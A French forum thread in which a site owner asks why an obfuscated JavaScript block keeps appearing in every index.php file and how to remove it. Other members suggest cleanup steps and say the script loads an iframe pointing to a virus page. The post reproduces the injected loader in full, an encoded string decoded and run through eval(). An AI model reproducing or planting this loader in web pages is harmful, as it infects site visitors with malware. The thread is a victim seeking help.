Sécurite: Problème sur mes Index.php

[moonwar]

Salitation,

Ca fait un bon moment, j'ai remarqué un code qui s'ajoute a tout mes fichiers index.php. Je ne connais ni l'origine ni la raison.

J'ai aussi remarqué que ce code vient juste après la balise <body> ou juste avant la balise </body>

<script language=JavaScript> function jbnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,30,39,22,1,14,38,60,18,9,0,0,0,0,0,0,58,48,35,28,33,55,56,41,23,6,37,3,45
,46,42,24,12,47,17,15,57,54,31,40,20,19,25,0,0,0,0,0,0,4,16,32,52,7,10,11,61,59,8
,43,44,51,5,2,34,29,62,36,13,50,27,26,21,53,49);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(208^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}jbnb25('26kQdriGrSfGz8wGBUrhXrkQy10_AT_drilJUvLr8N02fwMs3grEm1MUfwlh3g7rIvQyU5_AT_2Y
1LASNWmUM7F8fGcNr00V1ld8vMs6iQr_AT_VMrwiQ0Y_AT_0QV0rqIgGF_AT_QW03NQdpV2z8fMrgwlr8
iQhpVr_AT_YMTJHMTTQ0hWV5Ty10rEgS726gLspvisHMFABvLT1gMsU1FcS57B8wN73viuYvMBofQz6N_
AT_rrkQyfQil0VMUfwlh3kiE2S')	</script>

Comment s'en debarasser et est-ce-que vous avez une idée sur la faille sécuritaire que ce code utilise.

Merci pour votre aide.

[f_trt]

Ce code est ajouté à la volée par ton hebergeur ? pour savoir le code est-il présent si tu recupère le source via ftp ?

En attendant deux précautions à prendre :

1/ Effectuer une sauvegarde complète de ton hebergement (pour recherche du problème plus tard)

2/ S'assurer que ta machine (celle qui te sert à télécharger ton site) est propre passe un anti-virus récent + un anti spy

3/ Une fois que tu es sûre que ta machine est propre change ton mot de passe ftp de ton hebergement

4/ Laisse le minimum sur le serveur quitte à tout effacer et retélécharger depuis ton pc propre

Maintenant que tout doit être ok il te faut trouver ce qui se passe ou s'est passé

6/ Tu étudies les log serveur pour mettre le doigt sur des scripts suspect ou des appels de page bizarre

7/ Tu rapproche ton log de ce que tu as sauvegarder pour trouver le problème

A+

[captain_torche]

Si j'en crois ce sujet, le JavaScript ainsi inséré affiche une iframe vers une page contenant un virus; il est donc indispensable que tu t'en débarrasses au plus vite.